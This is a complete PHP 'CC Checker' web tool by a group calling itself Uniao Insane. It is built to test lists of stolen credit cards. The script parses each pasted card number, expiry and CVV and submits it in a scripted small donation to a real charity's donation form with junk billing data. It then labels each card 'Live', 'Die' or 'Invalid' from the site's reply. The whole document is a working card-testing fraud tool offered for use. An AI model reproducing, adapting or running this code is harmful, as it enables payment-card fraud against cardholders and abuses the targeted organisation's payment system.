	

    <title>CC Checker by Uniao Insane</title>
     
    <style>
    body, table{
            background:#000000;
            padding:5px;
            margin:5px;
            font-family:Tahoma;
            font-size:11px;
            color:#FFFFFF;
    }
    textarea,input,select
    {
            background:#736F6E;
            color:#FFFFFF;
            border:dashed #ffff00;
    }
    a {
            color:#00ff00;
    }
    a:hover{
            color:#ffff00;
    }
     
     
    fieldset {
      padding:5px;
      border-width: 1px;
      border-style: dotted;
      border-color: #ccc;
      text-align: left;
      background: #000000;
      position: relative;
    }
     
    legend {
      border-width: 1px;
      border-style: solid;
      border-color: #ccc;
      padding: 0 0.5em;
      background: #000000;
      font-size: 110%;
      color: #3e8f96;
      line-height: 1.5em;
      position: relative;
      top: -0.75em;
      letter-spacing: 2px;
      font-weight: bold;
    }
    .style1 {
            background-color: #008000;
    }
    </style>
    <?php
    error_reporting(0);
    ?>                                                             
    <?php
    error_reporting(0);
    set_time_limit(0);
    function _curl($url,$post="",$usecookie = false) {  
            $ch = curl_init();
            if($post) {
                    curl_setopt($ch, CURLOPT_POST ,1);
                    curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
            }
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
            curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/6.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3");
            curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
            curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
            if ($usecookie) {
            curl_setopt($ch, CURLOPT_COOKIEJAR, $usecookie);
            curl_setopt($ch, CURLOPT_COOKIEFILE, $usecookie);    
            }
            curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
            $result=curl_exec ($ch);
            curl_close ($ch);
            return $result;
    }
     
     
     
    function percent($num_amount, $num_total) {
    $count1 = $num_amount / $num_total;
    $count2 = $count1 * 100;
    $count = number_format($count2, 0);
    return $count;
    }
     
    function getStr($string,$start,$end){
            $str = explode($start,$string);
            $str = explode($end,$str[1]);
            return $str[0];
    }
     
    function checkMon($date,$type){
            $len = strlen($date);
            if ($type == 2){
                    if($len == 2){
                            return $date;
                    }
                    elseif($len == 1){
                            switch($date){
                                    case '1':  $date='01'; break;
                                    case '2':  $date='02'; break;
                                    case '3':  $date='03'; break;
                                    case '4':  $date='04'; break;
                                    case '5':  $date='05'; break;
                                    case '6':  $date='06'; break;
                                    case '7':  $date='07'; break;
                                    case '8':  $date='08'; break;
                                    case '9':  $date='09'; break;
                            }
                    }
                    return $date;
            }
            elseif ($type == 1){
                    if($len == 2){
                            switch ($date){
                                    case '01':  $date='1'; break;
                                    case '02':  $date='2'; break;
                                    case '03':  $date='3'; break;
                                    case '04':  $date='4'; break;
                                    case '05':  $date='5'; break;
                                    case '06':  $date='6'; break;
                                    case '07':  $date='7'; break;
                                    case '08':  $date='8'; break;
                                    case '09':  $date='9'; break;
                                    case '10': $date='10'; break;
                                    case '11': $date='11'; break;
                                    case '12': $date='12'; break;
                            }
                            return $date;
                    }
                    elseif($len == 1) return $date;
            }
            else return false;
    }
     
     
    function checkYear($date,$type){
            $len = strlen($date);
            if($type == 4){
                    if($len == 4) return $date;
                    elseif($len == 2) return "20".$date;
            }
            elseif($type == 2){
                    if($len == 2) return $date;
                    elseif($len == 4) return substr($date,-2);
            }
            else return false;
    }
     
    function multi_explode($pattern, $string, $standardDelimiter = ':'){
        $string = preg_replace(array($pattern, "/{$standardDelimiter}+/s"), $standardDelimiter, $string);
        return explode($standardDelimiter, $string);
    }
     
    function info($ccline,$type){
            $iscvv = 1;
            $pattern = '/[:\|\\\\\/\s]/';
            $line = multi_explode($pattern,$ccline);
           
            $typemy = explode(" ",$type);
            $typem = strlen($typemy[0]);
            $typey = strlen($typemy[1]);
           
            $amex = "american_express";
            $visa = "visa";
            $mast = "master";
            $disc = "Discover";
     
            foreach($line as $col){
                    if(is_numeric($col)){
                            switch(strlen($col)){
                                    case 15:
                                            if(substr($col,0,1)==3){
                                                    $ccnum['num'] = $col;
                                                    $ccnum['type'] = $amex;
                                            }
                                            break;
                                    case 16:
                                            switch(substr($col,0,1)){
                                                    case '4':
                                                            $ccnum['num'] = $col;
                                                            $ccnum['type'] = $visa;
                                                            break;
                                                    case '5':
                                                            $ccnum['num'] = $col;
                                                            $ccnum['type'] = $mast;
                                                            break;
                                                    case '6':
                                                            $ccnum['num'] = $col;
                                                            $ccnum['type'] = $disc;
                                                            break;
                                            }
                                            break;
                                    case 1:
                                            if (($col >= 1) and ($col <=12) and (!isset($ccnum['mon']))) $ccnum['mon'] = checkMon($col,$typem); break;
                                    case 2:
                                            if (($col >= 1) and ($col <=12) and (!isset($ccnum['mon']))){
                                                    $ccnum['mon'] = checkMon($col,$typem);
                                            }
                                            elseif (($col >= 9) and ($col <= 19) and (isset($ccnum['mon'])) and (!isset($ccnum['year'])))    $ccnum['year'] = checkYear($col,$typey);
                                            break;
                                    case 4:
                                            if (($col >= 2009) and ($col <= 2019) and (isset($ccnum['mon'])))    $ccnum['year'] = checkYear($col,$typey);
                                            elseif ((substr($col,0,2) >= 1) and (substr($col,0,2) <=12) and (substr($col,2,2)>= 9) and (substr($col,2,2) <= 19) and (!isset($ccnum['mon'])) and (!isset($ccnum['year']))){
                                                    $ccnum['mon'] = checkMon(substr($col,0,2),$typem);
                                                    $ccnum['year'] = checkYear(substr($col,-2),$typey);
                                            }
                                            else $ccv['cv4'] = $col;
                                            break;
                                    case 6:
                                            if ((substr($col,0,2) >= 1) and (substr($col,0,2) <=12) and (substr($col,2,4)>= 2009) and (substr($col,2,4) <= 2019)){
                            $ccnum['mon'] = checkMon(substr($col,0,2),$typem);
                                                    $ccnum['year'] = checkYear(substr($col,-2),$typey);
                        }
                        break;
                                    case 3:
                                            $ccv['cv3'] = $col;
                        break;
                            }
                    }
            }
            if($iscvv == 1){
                    if ($ccnum['type'] == $amex) $ccnum['cvv'] = $ccv['cv4'];
                    else $ccnum['cvv'] = $ccv['cv3'];
                    return $ccnum;
            }
        else return $ccnum;
    }
    function inStr($s,$as){
            $s=strtoupper($s);
            if(!is_array($as)) $as=array($as);
            for($i=0;$i<count($as);$i++) if(strpos(($s),strtoupper($as[$i]))!==false) return true;
            return false;
    }
     
    if ($_POST['cclist']){
                    global $cookie;
                    $cookie = tempnam('tmp','avo'.rand(1000000,9999999).'tmp.txt');
     
                    $cclive = "";
                    $ccdie = "";
                    $ccerr = "";
                    $cccant = "";
                    $uncheck = "";
                    $limit = "";
                   
                    $cclist = trim($_POST['cclist']);
                    $cclist = str_replace(array("\\\"","\\'"),array("\"","'"),$cclist);
                    $cclist = str_replace("\r\r","\r",$cclist);
                    $cclist = str_replace("\n\n","\n",$cclist);
                    $cclist = explode("\n",$cclist);
     
     
           
                    $STT = 0;
                    $TOTAL = count($cclist);
           
                    for($i=0;$i<count($cclist);$i++){
                            $ccnum = info($cclist[$i],"xx yyyy");
                            $type = $ccnum['type'];
                            $ccn = $ccnum['num'];
                            $ccmon = $ccnum['mon'];
                            $ccyear = $ccnum['year'];
                            $cvv = $ccnum['cvv'];
                           
                            if ($ccn){
                                    $STT++;
    // Process Check
                    $link = "https://www.hmi.org/donate";
                    $post = "user_donation_amt=%245.00&company_min_matching_amt=&currency_locale=en_US&donor_name_for_recognition_input=sdcasdcasdc&donor_name_for_recognitionsubmit=true&level_flexibleexpandedsubmit=true&level_flexibleexpandedsubmit=true&level_flexibleexpandedsubmit=true&level_flexibleexpandedsubmit=true&level_flexibleexpanded=67395&level_flexibleexpanded67395amount=%245.00&level_flexibleexpandedsubmit=true&level_flexiblesubmit=true&level_flexiblegift_type=1&level_flexiblegift_typesubmit=true&level_flexibledurationsubmit_skip=true&designate_gift_radio=Greatest+need&designate_giftsubmit=true&chapter_designation_2_dropdown=Choose+a+beneficiary+below...&chapter_designation_2submit=true&ice_bucket_challengehidden=&tribute_show_honor_fieldssubmit=true&tribute_type=&tribute_typesubmit_skip=true&tribute_honoree_first_namename=&tribute_honoree_first_namesubmit_skip=true&tribute_honoree_last_namename=&tribute_honoree_last_namesubmit_skip=true&stationery_layout_chooser=true&stationery_layout_id=22661&select_gridsubmit=true&send_ecardsubmit=true&ecard_recpientsname=&ecard_recpientssubmit=true&tribute_ecard_subjectname=&tribute_ecard_subjectsubmit=true&tribute_ecard_messagename=&tribute_ecard_messagesubmit=true&nullsubmit=true&preview_buttonsubmit=true&recipient_title_dropdown=Mr.&recipient_titlesubmit=true&recipient_first_name_input=casddcsad&recipient_first_namesubmit=true&recipient_last_name_input=cdascsa&recipient_last_namesubmit=true&recipient_address_line_1_input=csadacsa&recipient_address_line_1submit=true&recipient_address_line_2_input=sadcas&recipient_address_line_2submit=true&recipient_city_input=sascdsac&recipient_citysubmit=true&recipient_state_dropdown=Nunavut&recipient_statesubmit=true&recipient_postal_code_input=33176&recipient_postal_codesubmit=true&recipient_country_dropdown=Anguilla&recipient_countrysubmit=true&responsive_payment_typepay_typeradio=credit&responsive_payment_typepay_typeradiosubmit=true&responsive_payment_typecc_typesubmit=true&responsive_payment_typecc_numbername=$ccn&responsive_payment_typecc_numbersubmit=true&responsive_payment_typecc_exp_date_MONTH=$ccmon&responsive_payment_typecc_exp_date_YEAR=$ccyear&responsive_payment_typecc_exp_date_DAY=1&responsive_payment_typecc_exp_datesubmit=true&responsive_payment_typecc_cvvname=$cvv&responsive_payment_typecc_cvvsubmit=true&responsive_payment_typerouting_numbername=&responsive_payment_typerouting_numbersubmit=true&responsive_payment_typebank_accountname=&responsive_payment_typebank_accountsubmit=true&responsive_payment_typeverify_bank_accountname=&responsive_payment_typeverify_bank_accountsubmit=true&responsive_payment_type.account_typesubmit=true&responsive_payment_typeach_confirmsubmit=true&responsive_payment_typesubmit=true&billing_title=Mr.&billing_titlesubmit=true&billing_first_namename=sdds&billing_first_namesubmit=true&billing_middle_namename=sds&billing_middle_namesubmit=true&billing_last_namename=sdsdsd&billing_last_namesubmit=true&billing_suffix=II&billing_suffixsubmit=true&billing_addr_street1name=sdsdsd&billing_addr_street1submit=true&billing_addr_street2name=sdsd&billing_addr_street2submit=true&billing_addr_cityname=sdsdsdasd&billing_addr_citysubmit=true&billing_addr_state=IA&billing_addr_statesubmit=true&billing_addr_zipname=33176&billing_addr_zipsubmit=true&billing_addr_country=United+States&billing_addr_countrysubmit=true&donor_phonename=%2B13147454020&donor_phonesubmit=true&donor_email_addressname=lmoraisc%40hotmail.com&donor_email_addresssubmit=true&donor_email_opt_insubmit=true&pstep_finish=Complete+Donation&idb=1792388971&df_id=34265&34265.donation=form1";
                    $s = _curl($link,$post,$cookie);                       
                                            if(inStr($s,'The credit card was declined. Please check the information that you entered')){
                                                    echo "$STT/$TOTAL | <font color=red>Die | ".$cclist[$i]." "." | MoRais\n</font><br>";  
                                                    $ccdie .= $cclist[$i]."\n";
                                            }
                                            elseif(inStr($s,"There was a problem processing your request")){
                                                    echo "$STT/$TOTAL | <font color=DarkTurquoise>CC Invalida | ".$cclist[$i]." "." | MoRais\n</font><br>";
                                                    $ccinva .= $cclist[$i]."\n";
                                            }
                                            else{
                                                    echo "$STT/$TOTAL | <font color=green>Live | ".$cclist[$i]." "." | MoRais\n</font><br>";
                                                    $cclive .= $cclist[$i]."\n" ;
                                            }
                                           
                                    }
                                    flush();
                    }
                    unlink($cookie);
     
                    $per1 = percent(count(explode("\n",$cclive))-1,count($cclist));
                    $per2 = percent(count(explode("\n",$ccdie))-1,count($cclist));
                    $per3 = percent(count(explode("\n",$ccinva))-1,count($cclist));
                    $per4 = percent(count(explode("\n",$ccexp))-1,count($cclist));
                    $per5 = percent(count(explode("\n",$cccant))-1,count($cclist));
                    $per6 = percent(count(explode("\n",$limit))-1,count($cclist));
                    echo "<br><br><center><input type='submit' value='Next Check' onclick='location.replace(\"?\")'/></center>";
                    echo "<center>";
                    if($cclive!=""){
                            echo "<h2><font color=green>Live</font> $per1 % (".(count(explode("\n",$cclive))-1)."/".count($cclist).")</h2>";
                            echo "<textarea wrap=off rows=10 style=\"width:90%\">$cclive</textarea><br>";
                    }
                    if($ccdie!=""){
                            echo "<h2><font color=red>Die</font> $per2 % (".(count(explode("\n",$ccdie))-1)."/".count($cclist).")</h2>";
                            echo "<textarea wrap=off rows=10 style=\"width:90%\">$ccdie</textarea><br>";
                    }
                    if($ccinva!=""){
                            echo "<h2><font color=red>Invalid</font> $per3 % (".(count(explode("\n",$ccinva))-1)."/".count($cclist).")</h2>";
                            echo "<textarea wrap=off rows=10 style=\"width:90%\">$ccinva</textarea><br>";
                    }
                    if($ccexp!=""){
                            echo "<h2><font color=red>Exp</font> $per4 % (".(count(explode("\n",$ccexp))-1)."/".count($cclist).")</h2>";
                            echo "<textarea wrap=off rows=10 style=\"width:90%\">$ccexp</textarea><br>";
                    }
                    if($cccant!=""){
                            echo "<h2><font color=orange>CantCheck</font> $per5 % (".(count(explode("\n",$cccant))-1)."/".count($cclist).")</h2>";
                            echo "<textarea wrap=off rows=10 style=\"width:90%\">$cccant</textarea><br>";
                    }
     
    }
     
    else{
    ?>
    <center><span class="style1">TESTADOR DE CC<br>by Uniao Insane</span></center>
    <form method="POST" action="">
          <fieldset>
              <legend>Enter List CC :</legend>
                <form action="" method=post name=f>
     
            <p align="center">
            <textarea id="cclist" name="cclist" class="textarea" style="width: 978px; height: 210px">5451369875462198|6|2016|000 - Depende do site que estiver usando!</textarea><br>Duplicate Remove: <input name=dup type=checkbox value=1 checked> Sort By Type: <input name=type type=checkbox value=1 checked><br>
                            Filter Date : <input name=date type=checkbox value=1 checked> Only check BIN: <input type=text name=bin MAXLENGTH=6 size=8 style="text-align:center"><br>
                    <input type=submit name=submit value="CHECK">
     
            </p>
     
            </form>
    </fieldset>
            <?php }?>

